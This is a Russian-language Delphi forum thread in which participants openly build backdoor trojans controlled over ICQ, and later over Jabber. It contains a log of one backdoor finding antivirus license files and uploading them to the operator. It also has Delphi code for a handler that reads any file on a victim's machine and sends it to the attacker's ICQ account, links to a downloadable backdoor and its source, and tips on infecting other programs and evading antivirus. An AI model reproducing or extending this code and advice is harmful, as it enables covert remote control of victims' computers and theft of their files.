Пятница, 05.03.2021, 17:07 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: xXxSh@dowxXx, Anton93, Волк-1024  
delphicode » Delphi » Вопросы по Delphi » Zumm (BackDoor zumm)
Zumm
alex0097Дата: Понедельник, 01.11.2010, 07:38 | Сообщение # 1
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
Написал вирус через который можно упрвлять компьютером удаленно. Но вот загвозка, что управляется через ICQ. Очень неудобно.

Управление через ICQ выглядит так:
комп (21:55:29 31/10/2010)
Вошел в систему.

  Zumm (21:55:49 31/10/2010)
/help

  комп (21:55:49 31/10/2010)
/exit - выход
/shutdown - выключить машину
/download [ссылка];[путь] - скачать файл
/upload [путь];[имя] - отправить файл на FTP
/start [путь]; - запустить файл
/delete [путь]; - удалть файл
/changeicq [номер];[пароль] - сменить ICQ
/changepos [локация]; - сменить локацию
/changeid [метка]; - сменить метку машины
/find [файл];[корень] - найти файлы
/msg [текст сообщения]; - отправить сообщение
/report - доложить обстановку
/help - получить справку

  Zumm (21:56:18 31/10/2010)
/find [*.lic];[]

  комп (21:56:20 31/10/2010)
Начинаю поиск информации.

  комп (21:56:23 31/10/2010)
C:\Documents and Settings\Administrator\Desktop\nod32.lic
C:\Program Files\ESET\ESET NOD32 Antivirus\License\NOD14E8.lic

  комп (21:56:23 31/10/2010)
Поиск завершен.

  Zumm (21:56:45 31/10/2010)
/upload [C:\Program Files\ESET\ESET NOD32 Antivirus\License\NOD14E8.lic];[NOD14E8.lic]

  комп (21:56:46 31/10/2010)
Начинаю отправку файла.

  комп (21:56:48 31/10/2010)
Файл отправлен.

  Zumm (21:57:10 31/10/2010)
/start [C:\WINDOWS\system32\calc.exe]

  комп (21:57:11 31/10/2010)
Запускаю файл.

  комп (21:57:12 31/10/2010)
Файл запущен.

Может быть кто нить посоветую что можно использовать для основы? т.к управлять машиной удаленно неудобно через ICQ.
 
cool1Дата: Понедельник, 01.11.2010, 08:13 | Сообщение # 2
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
дай сорец посмотрю


За помощь ставьте +!
 
vvova15Дата: Пятница, 15.04.2011, 17:46 | Сообщение # 3
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
напиши клиент и визуализируй управление.
к примеру:
Code

//парсим сообщение о входе
procedure icqlcientmessagerecv(uin,msg:string,sender:tobject)
begin
if msg='вошел в систему' then memo1.lines.add(timetostr(time)+': '+'юзер вошел в систему');
end;
//посылаем команду, напимер удалить файл. путь к файлу проведен через edit1
procedure delbutonclick(sender:tobject)
begin
icqlcient1.sendmessage('delete '+edit1.text);
memo1.lines.add(timetostr(time)+': '+' файл '+edit1.text+' удален');
end;

и так далее...
и перед этим протокол не мешало бы привести к единому стандарту. к примеру:
клиент посылает:
команда|параметр1|параметр2|параметр3|...
а сервер в ответ
команда_ack|результат1|результат2|результат3|...
так будет удобнее добавлять новые команды и парсить сообщения об ответе
и если требуется многозадачное управление то добавить seq(уникальное число - номер команды)
тогда клиент можно будет написать без проблем



ICQ 185-398
 
BROVARДата: Четверг, 26.05.2011, 18:09 | Сообщение # 4
Был не раз
Зарегистрирован: 03.05.2011
Группа: Пользователи
Сообщений: 9
Статус: Offline
Вообще управление по принципу ICQ-бота отличная идея. Надо будет и самому посидеть над таким.

Абара!
 
dolphinДата: Пятница, 27.05.2011, 09:41 | Сообщение # 5
Администратор
Сообщений: 906
Статус: Offline
Quote (cool1)
Написал вирус через который можно упрвлять компьютером удаленно

Это уже бакдур

Есть тут http://delfcode.ru/load/soft/hak_soft/admin_icq_backdoor/3-1-0-513

Писалось с исходника в прикреплении.

Не соглашусь с автором, Тк щас большинство пользователей сидят за натом, ICQ как раз очень удобно на мой взгляд.
Прикрепления: ICQ_BackDoor_Al.txt(23.1 Kb)


Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик


Сообщение отредактировал dolphin - Пятница, 27.05.2011, 09:46
 
gravitasДата: Пятница, 27.05.2011, 16:53 | Сообщение # 6
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (dolphin)
Не соглашусь с автором, Тк щас большинство пользователей сидят за натом, ICQ как раз очень удобно на мой взгляд.

Тема действительно актуальна. http://www.hackzone.ru/forum/open/id/16116/ - когда то с товарищем делали)


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
sk0rpi0nДата: Суббота, 28.05.2011, 14:03 | Сообщение # 7
Участник
Зарегистрирован: 28.05.2011
Группа: Пользователи
Сообщений: 65
Статус: Offline
Хех, я сейчас тоже от делать нечего пишу Backdoor, через аську.Только как раз с тем самым визуальным оформлением.
Типа висит в окне программы управления поле editbox и рядом кнопка, такой вид подойдет для открытия и удаления файлов, работы с реестром удаленной машины, так же для вывода сообщения на экран.Остальное просто кнопками))
Но действтельно, через icq очень муторно, так как надо сначала добиться того, чтобы у жертвы появилсо програмко, который и будет принимать все команды от "управляющего" компа(Все, блин, боятся вирей, и не хотят ничего запускать))), и чтобы она нормально впилилась в систему, и все работало на ура. smile


C++ - попса :D

Сообщение отредактировал sk0rpi0n - Суббота, 28.05.2011, 14:05
 
XSPYДата: Суббота, 28.05.2011, 22:49 | Сообщение # 8
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
так в чем проблема?
сделай мини-сервер в своем сервере-бекдоре,или накрайняк,при запуске сделай автозаражение и склеивание с прогами своего сервера.Конечно,тут главное не переборщить-проактивка спалит.


Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
sk0rpi0nДата: Воскресенье, 29.05.2011, 12:04 | Сообщение # 9
Участник
Зарегистрирован: 28.05.2011
Группа: Пользователи
Сообщений: 65
Статус: Offline
Я извиняюсь, что не по теме, но новую создавать, думаю, не зачем.
Я в своей дистанционной управлялке сделал открытие файла с компа жертвы в memo в моей проге в текстовом виде.
программа отправляет запрос /open <путь к файлу> , а backdoor в ответ отправляет строки из файла так /opened <строка из файла>
В самом баскдоре есть мемо, в который сначала сохраняются строки из файла, а потом отправляются.Так вот, главный вопрос - как сделать открытие файла из любой директории, а не только из папки backdoora?
Код:
Code
procedure TForm1.ICQClient1MessageRecv(Sender: TObject; Msg, UIN: String);
var
    i,hh:integer;
    myFile : TextFile;
    letter : char;
    text   : string;
begin
hh:=1;
if pos('/open', msg)>0 then begin   // если в сообщении есть приставка /open, то погнали
    Delete(msg,Pos('/open', msg),5);  //очищаем сообщение от нее и получаем путь к файлу на компе
    AssignFile(myFile, msg);  //открываем его, присваиваем в переменную
    while not Eof(myFile) do  // пока не конец - считываем строки в встроенное memo.Вот тут вылетает ошибка, какая уже не помню....
       begin
         ReadLn(myFile, text);  //читаем строку из файла
         Memo1.Lines[hh]:=text;  // присваиваем ее строке из memo
         inc(hh); //делаем перенос строки в memo
        end;
    for i:=1 to memo1.Lines.Count do
    Icqclient1.SendMessage(UIN,'/opened'+Memo1.Lines[i]);  //  отправляем построчно на uin

Дак вот этот код быдлокодерский и еще не работает, вообще не с какими файлами, прошу помощи smile


C++ - попса :D

Сообщение отредактировал sk0rpi0n - Воскресенье, 29.05.2011, 12:08
 
gravitasДата: Воскресенье, 29.05.2011, 12:24 | Сообщение # 10
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (sk0rpi0n)
Delete(msg,Pos('/open', msg),5);

Code
delete(msg,1,6)

Code
Memo1.Lines.LoadFromFile(msg);
Icqclient1.sendmessage(uin,memo1.text);


Quote (sk0rpi0n)
   for i:=1 to memo1.Lines.Count do
Icqclient1.SendMessage(UIN,'/opened'+Memo1.Lines[i]);

Ты флудер а не трой написал biggrin

Quote (sk0rpi0n)
Так вот, главный вопрос - как сделать открытие файла из любой директории, а не только из папки backdoora?

/open C:\file.txt


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
sk0rpi0nДата: Воскресенье, 29.05.2011, 12:28 | Сообщение # 11
Участник
Зарегистрирован: 28.05.2011
Группа: Пользователи
Сообщений: 65
Статус: Offline
Quote
Ты флудер а не трой написал

biggrin
Ненене, флудер мы уже проходили))
А все присланные строки сохраняются в memo, и все получаетсямило и красиво biggrin
Щас проверю
UPD:Получилось, и даже текст пришел мне, но только я проверил из папки с прогой.А если я укажу путь там C:\Boot.ini?
Спасибо, все отлично работает!!


C++ - попса :D

Сообщение отредактировал sk0rpi0n - Воскресенье, 29.05.2011, 12:35
 
gravitasДата: Воскресенье, 29.05.2011, 12:30 | Сообщение # 12
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Зачем так извращаться? Посылай 1 раз но все.
Ну проверь)


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
alex0097Дата: Суббота, 02.07.2011, 12:09 | Сообщение # 13
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
Народ а вы не думали что лучше всего, это осуществлять через jabber, получится очень хороший jabber BackDoor Ведь jabber почти ни когда не вылетает. И есть много идей по поводу этого. Т.к можно базу сделать что бы для каждого компьютера он брал отдельный jabber
 
dolphinДата: Понедельник, 04.07.2011, 13:46 | Сообщение # 14
Администратор
Сообщений: 906
Статус: Offline
alex0097, есть компонент для Delphi под jabber?

Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
alex0097Дата: Понедельник, 04.07.2011, 20:58 | Сообщение # 15
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
dolphin да есть конечно.=)
 
delphicode » Delphi » Вопросы по Delphi » Zumm (BackDoor zumm)
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2021 Хостинг от uCoz